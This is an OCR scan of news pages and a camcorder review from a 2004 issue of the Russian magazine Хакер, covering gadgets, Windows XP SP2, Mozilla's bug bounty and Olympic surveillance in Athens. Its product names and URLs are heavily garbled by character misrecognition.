ческое тело. Если быть 
точным, это способ так- 
тильной аутентификации, 
при которой электрический 


сигнал передается по коже 
человека. В качестве об- 
разца была показана 
электродрель, которая ра- 
ботала только в паре с за- 
щитными очками. Очки пе- 
редают сигнал, соприкаса- 
ясь с головой человека, а 


дрель принимает его при 
контакте с кожей руки. Ес- 
ли же сигнала нет, то 
дрель напрочь откажется 
работать. Очень удобно 
следить за техникой безо- 
пасности на предприятиях, 
не правда ли? 


Такую систему можно ис- 
пользовать и в других сфе- 
рах деятельности людей. 
Например, в автомобилях 
для открывания дверей и за- 
пуска двигателя. Ток, проте- 
кающий по телу человека 
при таком процессе, не пре- 


вышает по силе 30 нА, поэ- 
тому абсолютно безвреден 
для здоровья человека. Тех- 
нология является очень 
перспективной, поэтому ее 
взяли на тестирование нес- 
колько европейских автомо- 
бильных компаний. ■ 
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ИЕ1Н8 



ХПКЕР/№09(69)/2004 



БП9Т9СИ 

КЯНЕРОФОНЫ 

вне закона 




В прошлом месяце в 
Кувейтское прави- 
тельство поступило 
большое количество жа- 
лоб от женщин, которые 
возмущены тем, что мо- 
лодежь имеет наглость 
фотать их со своих каме- 
рофонов. Кувейтское 
правительство согласи- 
лось, что от этого у ку- 
вейтских женщин теряет- 
ся честь и достоинство, 
поэтому внесло в закон 
ряд поправок, запреща- 
ющих любое использова- 
ние устройств блутус. 
Почему объявили бойкот 
безобидному блутусу, а 
не камерофонам? А хрен 
их знает, этих чукчей из 
Кувейта. Как всегда что- 
то перепугали. И теперь 
любому, кто заюзает лю- 
бой блутус-девайс, гро- 
зит от 2 до 5 лет тюрьмы. 
А в Саудовской Аравии 
из официальной прода- 
жи изъяли все мобиль- 
ники со встроенными 
камерами. Хотя из-под 
полы купить не пробле- 
ма - контрабанда нала- 
жена четко. Если ты со- 
бираешься в ближайшее 
время посетить одну из 
арабских стран, реко- 
мендую оставить свой 
мобильник дома. Пото- 
му что на границе кон- 
фискуют, и обратно ты 
его уже не получишь. ■ 
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НОВОЕ СЛОВО В 1ѴІ-РІ 



ЖЕЛЕЗО 



К омпания Веікіп планирует в сере- 
дине сентября представить свой 
новый маршрутизатор беспроводных 
сетей ѴѴігеІезз Рге-М Поиіег и ѴѴі-Гі- 
адаптер ІМоіеЬоок Иеіѵѵогк СагсІ. По 
всей видимости, в новом маршрутиза- 
торе будут применены новые техноло- 
гии, полностью совместимые лишь со 
следующей версией спецификации 
802.1 1 п. Здесь идет речь о техноло- 
гии МІМО (МиШрІе Іп, МиШрІе Оиі), ко- 



торая позволяет добиться значитель- 
ного увеличения радиуса действия и 
пропускной способности в сравнении 
с 802.1 1д. Новая технология позволя- 
ет также снизить уровень взаимных 
помех при работе разных устройств в 
частотном диапазоне 2,4 ГГц. Предс- 
тавители компании утверждают, что 
новинка обеспечивает радиус работы 
и пропускную способность в четыре (!) 
раза большую, чем у 802.1 1д. При 
этом устройства полностью совмести- 
мы с 802.1 1 Ь/802.1 1д. По оценкам 
аналитиков, стоимость ѴѴігеІезз Рге-М 
Поігіег (Г5О8230-4) составит около 
$180, МоіеЬоок Меѣд/огк СагсІ 
(Г5О80Ю) - $130. ■ 



ХПЙТЕК-К9ЛЕР 




МРЗДОЙ ДЛЯ БЕДНЫХ 



ВЗЛОМ 




Б илл Гейтс на досуге пораскинул моз- 
гами и сообразил, что драть по 200 
баксов за дистр винды с людей, которые 
столько за год не получают, как-то непра- 
вильно. Поэтому готовит к октябрю более 
дешевую версию ѴѴіпсІоѵѵз, предназна- 
ченную для «стран третьего мира». Пер- 
выми этой чести удостоятся Тайланд, Ма- 
лайзия и Индонезия, где ѴѴіп ЗІаПег 
ЕсІШоп (так называется маздай для бед- 
ных) будет поставляться вместе со всеми 
продаваемыми РС. Конечно, вряд ли сто- 
ит думать, что МісгозоЙ заболела нездо- 
ровой щедростью - просто таким обра- 
зом корпорация рассчитывает завязать 
хорошие отношения с правительством 
развивающихся стран и укрепить свои 
позиции в борьбе с фриварными юникса- 
ми. Интересно, что до недавнего време- 
ни М5 держалась принципа одинаковых 
цен на свою продукцию по всему миру, и 
принятое решение может стать первым 
шагом к урегулированию ценовой поли- 
тики в зависимости от экономического 
положения страны. Правда, понятия о 
справедливых ценах на лицензию, веро- 
ятно, у нашего брата и боссов МісгозоЙ 
сильно отличаются. Так что пираты пока 
могут спать спокойно. 



В недавнем пресс-релизе компания ОідаЬуІе представила новый кулер 30 
Поскеі Сооіег РСІІ22-ѴС. Этот пропеллер, благодаря возможности 
подстройки скорости вращения, может уверенно функционировать, не напря- 
гая тебя гулом взлетающего истребителя. Также - это придется по душе люби- 
телям моддинга - устройство оснащено светодиодной подсветкой. Скорость 
вращения вентилятора регулируется от 2500 до 4000 об./мин. Как и следовало 
ожидать, в комплект входят крепежные узлы для использования пропеллера с 
процессорами Іпіеі Репііит 4 1_ОА775/тРОА478, а также ШО К8 и К7. 

СідаЬуІе сочла необходимым уточнить, что ее платы, предназначенные для ис- 
пользования под процессоры АІѴЮ с интерфейсами Соске! А и Зоскеі 754, так- 
же поддерживают процессоры Зетргоп. ■ 



' 



П0Б0РПТ0РИЯ К0СПЕРСК0Г0 РЯБ0ТЯЕТ СТОХОНОВСКИНИ ТЕМПННИ 



ВЗЛОМ 




Т емпы работы Лаборатории Касперского растут сообразно темпам роста количества вирей 
в сети. В 2000 г. в базу было добавлено 63 обновления, в 2001 г. - 205, в 2002 г. - 652, в 
2003 г. - 818, за прошедшие месяцы 2004 г. - уже более полутора тысяч. С недавних пор 
Евгений Касперский и Со. решили, что обновление раз в 3 часа - слишком мало, и ввели новый 
лозунг: «Даешь каждый час по обновлению!». Неплохо, неплохо. Но есть еще куда развиваться. 
Ждем новых лозунгов: «Ахтунг! Обновление раз в полчаса», «Засекайте время, через десять 
минут обновим!», «Поминутное обновление в массы!». Главное, чтобы оперативность не влияла 
на качество сервиса. 






ГОВОРЯЩИЙ ДЕТЕКТОР 
МОБИЛЬНЫХ 8Н055В 



НІТЕСН 




Н ет, говорящий детек- 
тор мобильников - от- 
нюдь не лишняя безделуш- 
ка. Устройство занимается 
обнаружением в помеще- 
нии работающих сотовых 
телефонов. Например, в 
театре, чтобы ни один чис- 
то реальный пацан не заго- 
ворил на весь зал во время 



финальной арии умираю- 
щего лебедя на руках Эв- 
ридики :). В общем, везде, 
где пользоваться сотовой 
связью запрещено, такой 
детектор будет как нельзя 
кстати. Обнаружив работа- 
ющий сотовый телефон, 
устройство воспроизведет 
сообщение, в котором бу- 
дет подробно расписано, 
почему нельзя юзать мо- 
билу в данном месте. Со- 
общения хозяева могут за- 
писывать длиной до 20 се- 
кунд. Детектор способен 
отлавливать даже жучки и 
различные шпионские ви- 
деокамеры, которые пере- 
дают информацию по ра- 
диоканалам. Стоимость та- 
кого удовольствия 240 
убитых енотов. ■ 



БОПЬШОЯ СЛЕЖКИ В МАЛЕНЬКИХ ЛФИНЛХ 




В этом году Олимпийские игры проходят 
в Афинах. Тысячи людей навестили 
этот исторический центр, чтобы своими 
глазами посмотреть на праздник спорта. 
Понятное дело, при таком количестве наро- 
ду в наше неспокойное время возможно 
всякое. Поэтому группа компаний (Зіетепз, 
СепегаІ Оупатісз, НопуѵѵеІІ, ЕІЬіІ Зузіетз и 
др.) под руководством американской кор- 
порации Зсіепсе Арріісаііоп ІпіегпаііопаІ 
разработала и внедрила в Афинах самую 
совершенную в мире систему слежения. 
Более тысячи камер с микрофонами, уста- 



новленные на улицах греческих городов, в 
портах и аэропортах, записывают разгово- 
ры пешеходов. Речь затем переводится с 
помощью специального ПО в текст и зано- 
сится в базу данных. Туда же попадает весь 
мыльный трафик, ходящий в инете. База 
данных автоматически мониторится на на- 
личие потенциально опасных фраз (ядерное 
оружие, бомба, взорвать). Помимо этого, 
на поддержку безопасности выделено 4000 
машин, патрулирующих Афины, 12 катеров, 
9 вертолетов, 4 дирижабля с различными 
сенсорами (в том числе и химическими) и 4 
мобильных центра управления. 

Общие расходы составили более полутора 
миллиардов долларов. В других городах, 
где раньше проходили Олимпийские игры, 
тоже ввели электронные средства слеже- 
ния, так что операция носит международ- 
ный характер. 

В Афинах прошло несколько демонстраций 
в знак протеста против нарушения прав на 
личную жизнь. В результате множество ка- 
мер были обрызганы краской и выведены 
из строя. ■ 





РАЗГОНА ПРОЦЕССОРА! ШѴиГ.ЕРОХ.ПІІ 



ЩгЕЖ 

НЕ ЗАБУДЬТЕ ПРИСТЕГНУТЬ РЕМНИ! 



ВОЗМОЖНОСТЬ 






V* г # 



О чередной привод 
для работы с опти- 
ческими дисками предс- 
тавила компания 
Затзипд Еіесігопісз. Но- 
вый пишущий ЭѴЭ-при- 
вод получил красноре- 
чивое название Т5- 
Н552. Устройство под- 
держивает запись дис- 
ков ЭѴЭ+В со скоростью 
16х и 12 -скоростную за- 
пись ОѴЭ-В. Помимо 
поддержки ставших уже 
классикой ОѴЭ+/-В/ РѴѴ 
дисков, привод умеет 
работать и с ОѴЭ+В9. 
Как всегда, в приводах 
Затзипд реализовано 
несколько фирменных 
технологий: 5АТ (ЗреесІ 
Асіщзіплеп* ТесІппоІоду) 
позволяет подстраивать 
скорость вращения для 
наилучшего качества за- 
писи, ТАС (Тііі Асіиаіог 
Соплрепзайоп) - анти- 
вибрационная система и 
ЭоиЫе ОРС (Орйплипл 
Роѵѵег СопігоІ), которая 
позволяет регулировать 
мощность излучения в 
зависимости от типа но- 
сителя. 

Остальные параметры ни- 
чего экстремального в се- 
бе не таят: Т5-Н552 осна- 
щен интерфейсом ЮЕ, 
может работать как на бо- 
ку, так и на пузе, объем 
буфера составляет стан- 
дартные 2 Мб, а размеры 
- 148,2x184x42 мм. Ско- 
рость чтения П\Ю - 16х, 
СЭ-ВОМ - 48х, записи: 
Ш+Р - 16х, Ш+РѴѴ - 
4х,Ш-Р-12х,Ш-РѴѴ- 
4х, Э\Ю+В9 - 2.4х, СЭ-В - 
40х, СР-ВѴѴ - 32х. ■ 



новый экран 



ЖЕЛЕЗО 



папская цифрп 
от коппк 



І1 начале серийного производства 2,6-дюймового ЖК-экрана, выполненного с 


ЖЕЛЕЗО 


II использованием аморфного кремния, сообщила компания Затзипд 





ЕІесйопісз. Еще в мае этого года инженеры компании завершили работу над 1 ,94- 
дюймовым экраном с разрешением 207 ррі. Представленная же новинка может 
похвастаться лучшим качеством - разрешение составит почти 300 ррі, контраст- 
ность достигнет показателя 1 50: 1 , а яркость - 1 50 нит. Таким образом, по завере- 
ниям специалистов, картинка на экране будет видна даже в условиях яркой осве- 
щенности, когда экран освещен прямыми солнечными лучами. Инженеры 
Затзипд прочат экрану большое будущее и обширное применение в производ- 
стве КПК и смартфонах. Изготовители КПК должны успеть наштамповать доста- 
точное количество наладонников к началу рождественских каникул, времени тра- 
диционного повышения спроса на подобную продукцию. ■ 




ГОПОГРОФИЧЕСКИЙ ДИСПЛЕЙ 



НІТЕСН 



Р мериканская компания 
АсШаІіІу ЗузЕетз предостави- 
ла на суд зрителей самый настоя- 
щий голографический монитор. В 
нем отсутствует понятие ЖК или 
ЭЛТ-матрицы. Устройство предс- 
тавляет из себя прозрачную сферу 
диаметром 51 см, укрепленную на 
плоской подставке. Внутри этой 
сферы формируется объемное 
изображение на основе технологий 
ОрепСИ и ѴВМІ_. Разрешение тако- 
го экрана достигает ста миллионов вокселов (объемные пикселы). К компью- 
теру голографический монитор подключается через интерфейс ЕЛіегпеІ Что- 
бы увидеть объемную картинку, не нужно одевать специальных очков. Пос- 
мотрев на монитор с других ракурсов, можно увидеть разные части изобра- 
жаемого объемного объекта. Такую технологию планируют использовать во 
многих областях: медицина, биология, геология, география и т.д. ■ 

ПЛОТНЕЕ, ЕЩЕ ПЛОТНЕЕ! 



ЖЕЛЕЗО 




В семье миниатюрных жестких 
дисков ТозЕііЬа пополнение. На 
этот раз инженеры компании порадо- 
вали нас двумя 1 ,8-дюймовыми (4,5 
см) новинками: МК6006САН ем- 
костью 60 гигабайт и 30-гиговым 
МК3006САЕ Обе представленные мо- 
дели обладают 2 Мб кэшем, а шпин- 
дель каждой из них вращается со ско- 
ростью 4200 оборотов в минуту. Уже 
стало традицией, что каждое такое 
устройство обладает какими-то уни- 
кальными характеристиками. Так и в 



этот раз: плотность записи составляет 
аж 93,5 Гбит/дюйм л 2. Причем любой 
из этих двух накопителей можно не 
по-детски шмонать - они выдержива- 
ют нагрузки до 500 д, а в нерабочем 
режиме и все 1500 д. При этом энер- 
гопотребление новинок на 20% ниже, 
чем у предыдущих моделей, а уро- 
вень шума составляет 1 6 дБ для 30 Гб 
диска и 1 8 дБ для 60 Гб. Серийное 
производство этих малюток весом 
чуть более 50 граммов планируется 
начать в ближайшее время. ■ 



И нтересную камеру анонсировала ком- 
пания Кобак - ЕазуЗГіаге 0X7590. На 
первый взгляд мне показалось, что это лег- 
кий апгрейд предыдущей модели, однако 
внешность опять обманула. Новинка обору- 
дована более качественной сенсорной мат- 
рицей с более чем пятью миллионами актив- 
ных пикселов, инженеры компании также 
почти полностью переколбасили систему ав- 
тофокусировки. Чтобы не распыляться не- 
нужными словами, просто приведу ключе- 
вые характеристики новой камеры: ■ 

л Сенсорная матрица: 5,36 млн. пикселов (1/2,5-дюйма), 
эффективных пикселов путь больше 5 млн. 

^ Объектив: ЗШГОЕК-ККЕШСН ѴАКІОбОЦ 
десятикратный оптический зум, фокусное расстояние 
6,32-63,2 мм (38-380 мм в 35-мм эквиваленте) 
^ЗхбідіЕаГгоогп 

^ Хитрая система автофокусировки с двумя сенсорами и 
кучей режимов (многозональный, центровзвешенный, с 
ручной установкой - слева, по центру, справа). Дистанция 
фокусировки: 0,6 м - бесконечность (*), 2,0 м- 
бесконечность (Т) в обычном режиме, 0,12-0,7 м (Щ, 1, 2-2,1 
м (Т) - в режиме макросьемки 
л ЖК-экран: 5,6 см, ТЕТ, 153 тыс. пикселов 
л Видоискатель: электронный, 311 тыс. пикселов 
л Диапазон выдержек: 1/8-1/1700 с в автоматическом 
режиме, 16-1/1000 при ручной установке 
^Светочувствительность: 150 80-160 при автоматической 
установке, 150 80/100/200/400 и 800 (1552x1164) при ручной 
установке 

А Видеовыход: ЕІТ5С/РАЕ 

а Стандартные размеры фотографий: 2576x1932, 2576x1716, 
2304x1728, 2048x1536,1552 x1164 
а Пакетная съемка: до 5 кадров со скоростью менее 2,5 Ерз 
^ Запись видео: 640х480@12 Ерз, 320х240@20 Ерз, кодек 
МРЕ64 

А Карта памяти: 50/ММС 
а Интегрированная флешка: 32 Мб 
А Источник питания: ионно-литиевый аккумулятор (1700 
мАч), К(ШАК Ы-Іол 1050 мАч, опционально - док-станция, 
адаптер питания (5 В постоянного тока) 

А Размеры - 99,6x81,2x79,9 мм 
а Масса - 350 г без аккумулятора и сменного носителя 



4 гола ПРОЕКТУ «ТЕСТИРОВПНИЕ 0 ШЕ > 



7 августа 2004 г. исполнилось ровно 4 
года крупнейшему в России проекту 
бесплатного тестирования и сертификации 
ІТ-специал истов и пользователей: ЗРЕСІАІ_- 
ІЗТ: Тестирование Оп-Ііпе. За это время 
170 тысяч пользователей сдали тесты 
более 665 тысяч раз и более 27 тысяч из 
них получили сертификаты специалистов. 
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ТОВАР СЕРТИФИЦИРОВАН 



МИНЗДРАВ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






СаЬлготап 

МесІаІ Ш Нопог: 
РасШс АззаиК 

Сороковник 




ВШ-ВПѴ 



ЖЕЛЕЗО 



БУДЕТ ОСЕНЬЮ 



П олтора десятка ведущих ми- 
ровых производителей высо- 
котехнологичных устройств объе- 
динили свои усилия для скорей- 
шей разработки полноценной 
спецификации ВІи-гау Оізс. Набор 
технических документов, как от- 
мечается в ряде официальных 
пресс-релизов, будет готов к 30 
сентября. Речь идет о новой 
перспективной технологии опти- 



ческих носителей ВІи-гау Оізс, на 
которые планируется записывать 
видео высокого качества в фор- 
мате НОТѴ. Среди 13 фирм, при- 
нявших участие в составлении 
спецификаций, есть такие 
монстры, как 5опу, Рапазопіс и 
РеІІ. Неподдельный интерес этих 
компаний вызван выдающимися 
возможностями новой техноло- 
гии. У производителей полно пла- 



нов по ее применению в уже су- 
ществующих продуктах. Так, Зопу 
намеревается оснащать будущее 
поколение игровых приставок 
РІау5Міоп2 видеопроигрывате- 
лем ВІи-гау Різс. А Затзипд и 
вовсе представил прототип свое- 
го пишущего ВІи-гау Різс приво- 
да, сообщив при этом, что он мо- 
жет появиться в продаже уже в 
конце текущего года, і 



И02ІШІ ПЛОТИТ КОКЕРОМ 
30 ВЗПОИ СВОЕГО ПО 



П ока МісгозоЙ 
выделяет сто- 
тысячные гранты на 
выслеживание авто- 
ров вирей и червей, 
другие компании за- 
ботятся о своей бе- 
зопасности по-свое- 
му. Компания МогіІІа 
Роипсіаііоп, разрабо- 
тавшая одноимен- 
ный браузер, запус- 
тила МогіІІа Зесигііу Вид Воипіу Ргодгаш, в рамках которой будет выпла- 
чивать по $500 за каждую найденную уязвимость в ее ПО. Президент 
компании Мишель Бейкер прокомментировал это так: «Недавние собы- 
тия продемонстрировали необходимость принятия подобных мер. Новая 
программа позволит нам своевременно выявлять проблемы с обеспече- 
нием безопасности, давая нашим помощникам возможность заранее на- 
ходить имеющиеся уязвимости. Это, в свою очередь, позволит нам вов- 
ремя приступить к их исправлению - прежде, чем ими успеют восполь- 
зоваться злоумышленники». МогіІІа не первая компания, которая пред- 
лагает бабло за найденные баги в своих продуктах. Но тех, кто готов 
отстегнуть хакерам за найденные дыры, пока еще мало. В основном это 
зесигйу-компании, озабоченные защищенностью своего ПО. ■ 




«Я или твой 
компьютер?!» 



ТЕСН 

Новости; 
Первый взгляд; 
Рассказываем 







адвокат решип засудить ѵаноо 



ВЗПОИ 



В один прекрасный день один хитрый кали- 
форнийский адвокат решил пообщаться. И 
не где-нибудь, а в Сети, и не просто в Сети, а на 
форуме Ѵаііоо.сот. Но не успел дядя рот открыть, 
как понабежала толпа анонимусов и обосрала 
дядю по самые уши. Нехорошими словами наз- 
вала, очень далеко заслала. Адвокат, который к 
обопру не привык, очень обиделся, но как нака- 
зать анонимных развлекающихся подростков? 

Никак. Разве что... 

Недолго думая, адвокат Стивен Гэлтон подал в суд 
на Ѵаітоо, назвав компанию прибежищем антисо- 
циальных фриков, оскорбивших его честь и достоинство. Гэлтон потребовал, чтобы УаГіоо раскрыла при- 
ватную инфу всех тех урюков, которые оскорбили его в тот самый день, и выплатила ему бабло за причи- 
ненный моральный ущерб. Мало того, адвокат рассчитывает, что его поддержит вся Америка в лице юзе- 
ров, незаслуженно оскорбленных в Сети. Смешной, однако. Уаіпоо пока никак не прокомментировала си- 
туацию. Не знаю, как тебе, а мне хочется, чтобы дядю Стива выгнали из суда с позором. ■ 







8ЕНѴІСЕ РИСК 2 УЖЕ В СЕТИ! 



ВЗЛОМ 



Н а официальном сайте 
МісгозоЙ, наконец, появил- 
ся долгожданный 5Р2 для ѴѴіп 
ХР. По заверению М5, емкое 
(266 Мб для РгоТеззіопаІ вер- 
сии) обновление позволит на 
порядок поднять уровень защи- 
щенности ОС. В сервис пак 
вошли заплатки от всех извест- 
ных на тот момент уязвимостей, 
а также некоторые новые прият- 
ные фичи. Например, М5 йге- 
ѵѵаІІ, который пропишется в ав- 
торан сразу после установки 
пака и будет охранять комп от заразы. Также теперь винда разжилась 
Зесигііу- центром, в котором показывается вся зесигйу-информация и 
можно регулировать настройки безопасности. Усовершенствованы ста- 
рые опции, например, автоапдейт и поддержка беспроводной связи. ІЕ 
и ОиІІоок Ехргезз стали более защищенными. 

У второго сервис пака нашлись и обратные стороны. После его установ- 
ки начинают глючить или вообще перестают работать некоторые прог- 
раммы (список здесь: шѵѵ.$есигііуІаЬ.ги/4Л78.ііІтІ), снижается скорость ра- 
боты по ѴѴі-Рі. На сайте шѵшісго$оГС.соп можно найти все подробности о 
5Р2. А скачать полный дистрибутив можно здесь: 
ѵѵѵѵѵѵ.тоз1:соп$иШпд.пеІ:/ирІоас1/ѴѴіпсІоѵѵ$ХР-КВ835935-5Р2-ЕНІІ.ехе или здесь: 
Шр://саЫе.рсІіоте.пеІ/зу$1:ет/ра1:с1і/хрзр2_КТМ_ЕНІІ.ехе. ■ 




ЗАВИС ©ТЕЛЕК ОМ 

ОРГАНИЗАЦИЯ 
ВЫДЕЛЕННЫХ КАНАЛОВ 
ИНТЕРНЕТ 
с использованием 



тел пологий 



ІІ8В-ВИНЧЕСТЕР С ДОСТУПОМ 

по отпЕчаткаи попьцев 



НІТЕСН 



К Компания ТІпапко 
V і с I о г і а 
(шѵѵ.іііапко.со.ір) предста- 
вила широкой аудито- 
рии свой новый продукт. 

Это внешний ІІЗВ-вин- 
честер, на котором уста- 
новлен специальный 
сканер для распознава- 
ния отпечатков пальцев. Нет, полицейские не станут снимать таким уст- 
ройством у задержанных отпечатки, им и талька хватает для этих целей. А 
вот если у владельца украдут такой носитель информации, то воспользо- 
ваться им не удастся. Доступ разрешается в том случае, если хозяин (их 
число может доходить до пяти) приложит свой палец к сканеру. Если же 
по каким-либо причинам распознать отпечаток не удается, то возможен 
доступ к информации по паролю. В противном случае вся информация на 
диске будет зашифрована по алгоритму РЕС с 40-битным ключом. ■ 




ИМ 
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□ аждый хакер иечтает иметь компактную цифровую видеокамеру 
дпя съемки своих оффлайновых подвигов и шпионажа за 
девчонками. По понятным финансовым причинам особенно 
интересны модели, отличающиеся приемлемой ценой (от $350 до 
$550]. Но хорошо пи работают бюджетные пііпіОІІ камкодеры? Это мы 
и решипи сегодня проверить. 



Л ТЕХНОЛОГИЯ МІШОІІ 

Взглянем на предоставленные каме- 
ры. Все они относятся к типу тіпЮѴ. 
Рассмотрим технологию поближе, 
чтобы понять преимущества и не- 
достатки, которыми обладают кам- 
кодеры данного типа. 

Начнем с расшифровки аббревиа- 
туры тіпЮѴ. Именно эта технология 
изначально называлась ОМ - ЭідіІаІ 
Ѵібео, но компания 8опу решила 
пойти по пути удешевления и созда- 
ла ОідіШ. Принципиальной разницы 
у этих форматов нет, кроме сущест- 
вующего носителя, на котором сох- 
ранялись данные видеосъемки. Зопу 
воспользовалась уже распространен- 
ными и оттого дешевыми кассетами 
НІ8. Из-за этого камеры получились 
довольно габаритными. 

Другие компании взялись за 
разработку нового носителя (име- 



ется в виду исключительно магнит- 
ная пленка) меньших размеров. 
Принцип кодирования и записи ос- 
тался прежним. 

Л ГОЛОВКО 

При уменьшении габаритов столкну- 
лись с проблемой повышения плот- 
ности записи. Решить задачу удалось 
путем увеличения скорости вращения 



головки с 4000 об/мин у обычных ви- 
деокамер до 9000 у тіпЮѴ. 

Головка направлена под углом к 
пленке. Лента движется с постоян- 
ной скоростью. Для того чтобы умес- 
тить больше данных на единице дли- 
ны пленки, нужно производить за- 
пись не линейно (вдоль пленки), как 
это делается на аудиокассетах, а под 
углом. В результате имеем не пря- 
мую дорожку записи, а наклонные 
метки. Чем выше скорость вращения 
головки, тем больше меток, а значит 
и больше записанных данных. 



Л поток донных 

Получаемая картинка имеет разре- 
шение 720x576, что при коэффици- 
енте сжатия ОМ 5:1 будет давать по- 
ток данных 25 МЬіІ/з- На звук отво- 
дится 1 ,5 МЬіІ/з и до 3,5 МЬіІ/з идет 
на служебную информацию Діте 
собе, избыточное кодирование). В 
результате мы получаем поток до 30 



МЬіІ/з. Несложно подсчитать, что 
минута видео (60 секунд) занимает 
примерно 1800 МЬІІ или 225 МЬуІе. 

Интерфейс РігеѴѴіге (ІЕЕЕ 1394) мо- 
жет работать на скоростях 98,304 
МЬіѴзес, 196,608 МЬіІ/зес и 393,216 
МЬй/зес. Обмен данных с современ- 
ными винчестерами и оптическими 
дисководами от 260 МЬй/зес. Так что 
с потоком в 30 МЬіІ/з вполне можно 
справиться на современном компью- 
тере. Однако для работы с видео 
удобнее использовать сразу два ГЮЭ. 

^ ЗВУК 

Звук в ОМ можно писать двумя спо- 
собами: 1) одна стереодорожка 16 
ВіІ и 48 кНі, 2) две стереодорожки 
1 2 ВіІ и 32 кН і. Вторая стереодо- 
рожка предназначена для коммента- 
риев и фонового звукового сопро- 
вождения при монтаже. 



ВИДЕО 

Видео в формате ОМ можно писать 
также двумя способами: ЗР (Зіапбагб 
РІау) и 1_Р (І_опд РІау). В специфика- 
ции стандарта Оідііаі Ѵібео режим за- 
писи ЗР является основным, и имен- 
но он разрабатывался изначально 
для сохранения видеопотока в пер- 
вых ЭѴ-камерах. 1_Р был привнесен 
позже из аналоговых Ні8/Ѵібео8 ви- 
деокамер. Он подразумевает запись 
с меньшей избыточностью, за счет 
чего на одну кассету помещается в 
полтора раза больше видео. Но в 
отличие от аналоговых камер, в І_Р- 
режиме не происходит потери каче- 
ства, просто объем избыточной ин- 
формации, с помощью которой мож- 



Ніігуида, 24.08.2004 18:21 : 
Редакция выражает благодарность 
за предоставленное на тестирование 
оборудование компаниям: 
«ОЛДИ» (ш/ѵѵ.оісіі.ги, 

(095) 105-0700, 232-3009), 
«1Л.ТВА Сотриіегз» 
(шл/ѵ.иіігасотр.ги), 
представительству Сапоп в Москве 
(шм.сапоп.ги, (095) 258-5600), 
представительству компании 
Рапазопіс (ѵѵѵѵѵѵ.рапазопіс.ги), 
представительству компании 
Затзипд (ѵѵѵт.затзипд.ги, 

(095) 258-5600). 



но восстановить потерянные кадры, 
уменьшается, а видео остается 
прежним. Есть один недостаток: при 
использовании некачественной 
пленки или записи разными камера- 
ми на одну кассету в режиме І_Р мо- 
гут появляться артефакты в виде вы- 
падания кадров или распадания 
изображения на квадраты. 

НООЕЖНОСТЬ 
ВЫШЕ ВСЕГО 

Нередко можно услышать мнение, 
что из-за малых габаритов и высоких 
оборотов вращения головки тіпЮѴ 
камеры уступают ОідіШ в плане на- 
дежности. Это не так! Гарантия, да- 
ваемая производителями на свои из- 
делия, примерно одинакова и равна 
1 000 часам наработки на отказ. А 
срок жизни механики определяется 
только честностью фирмы. 

Также бытует мнение, что надеж- 
ность записи на ЭідіШ гораздо вы- 
ше, нежели на тіпЮѴ. Разумное зер- 
но в этих рассуждениях есть. Из-за 
меньших размеров и большей плот- 
ности записи с особой остротой вста- 
ет проблема загрязнения головок. 
Причем чем реже ты используешь ка- 
меру, тем больше шансов после съ- 
емки получить изображение, состоя- 
щее из россыпи квадратов. Избежать 
возможной проблемы довольно прос- 
то - нужно воспользоваться специаль- 



1 Также бытует мнение, что 
надежность записи на ШдіШ 
I гораздо выше, нежели на тіпЮѴ. 

1 

Получаемая картинка имеет 
разрешение 720x576. 
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Простая установка беспроводного узла доступа 
Мониторинг сетевого соедиеения == 
Интеллектуальный разгод^^^^^^І 
Охлаждение без веетиляторов^ІН 



МЩК1І 

Ргшсііѵс 



ГНТТНТпТ 



т\ 



1 



■ Чипсет ІпіеІ 925Х 

■ Двухканальная 99112 533 с ІпіеІ РАТ 
«Встроенная беспроводная сеть 1№Гі-д™ 

* ЗегіаІ АТА и ШЕ ПАШ 

« Аудип-кодек Нідб ПеТіпШоп Аигіін 

■ 2 контроллера 1 Гбит/с сетей 

• 1394б/а 



я. Л 



оЬЙГі і 



ГЕЕ! 



Чипсет ІпіеІ Я15Р 

Двухканальная В0Н400 

Аудио-коуек 

Ніуб Пеііоіііоп Аийіо 

ЗегіаІ АТА о ШЕ НАШ 

Кпнтрпллер 

1 Гбит/с сетей 



Чипсет ІпіеІ 915С 
Двухканаоьная ВОН о 0002 
Встроенное видео 
ІпіеІ Бгарбісо Мейіа Ассеіегаіог ! 
Аудио-коуек Нідб ОеТіпіІіоп Авйіо 
Контроллер 1 Гбпт/с сетей 
* 1394а 



I в 1 ІТІНШМ4 

Чипсет ІпіеІ 915Р 
Двухканальная 9ПН2 533 
Встроенная беспровоуная сеть ИНН-! 
2 контровлера 1 Гбит/с сетей 
Аудпо-коуек Нідб ОеТіпіІіоп Аийіо 
ЗегіаІ АТА о ШЕ НАШ 
1394й/а 



Тел: (095) 974-32-10 
ѴѴеЬ: И«р://ѵѵѵѵѵѵ.рігі1:.ги 



тші 



Тел: (095) 995-2575 
ѴѴеЬ: ИНр://ѵѵѵѵѵѵ.ос5.ги 



Тел: (095) 708-22-59 
Факс: (095) 708-20-94 



Тел: (095) 745-2999 
ѴѴеЬ: НПр://ѵѵѵѵѵѵ.сіііІіпк.ги 



Тел: (095) 105-0700 
ѴѴеЬ: Шр://: ѵллл/ѵ.оісіі.ги 



- — К Г.ЛЫИ ВЕТЕР 

Тел: (095) 269-1776 
ѴѴеЬ: ИПр://ѵѵѵѵѵѵ.сІІ5Іі.ги 




Тел: (095) 799-5398 
ѴѴеЬ: НПр://ѵѵѵѵѵѵ.ІІ 2 агсІ.ги 












Съемки любительской камерой 
чаще всего производятся без 
штатива и в движении. 



зсаіі-переходник, пулы дистанци- 
онного управления, наплечный ре- 
мень и два СЭ-диска с программа- 
ми монтажа видео. В стандартную 
поставку входит аккумулятор ЗВ- 
15110, 7,4 V, 1100 тАІі (Ы-іоп), ко- 
торый обеспечивает до 1 ,5 часов 
непрерывной съемки (при исполь- 
зовании видоискателя и включен- 
ном режиме ночной съемки). Каме- 
ра ложится в руку довольно удобно, 
управление трансфокатором, кноп- 
ка РНОТО и управления записью 
оказываются прямо под пальцами. 
Монохромный видоискатель может 
подниматься в горизонтальной 
плоскости. Стереомикрофон распо- 
ложен над объективом и направлен 
вверх, что затрудняет запись звука 
от удаленных объектов и добавляет 
множество шумов. Для любителей в 
наличии функция «еазу О», которая 
активирует режим автоматического 
контроля параметров съемки. Если 
не хочется задумываться над наст- 
ройками баланса белого и прочими 
тонкостями - смело нажимай эту 
кнопку и снимай. Производить сь- 
емку гораздо удобнее, задейство- 
вав жидкокристаллический цветной 
видоискатель 2,5 дюймов. Его мож- 
но вращать на 270 градусов в гори- 



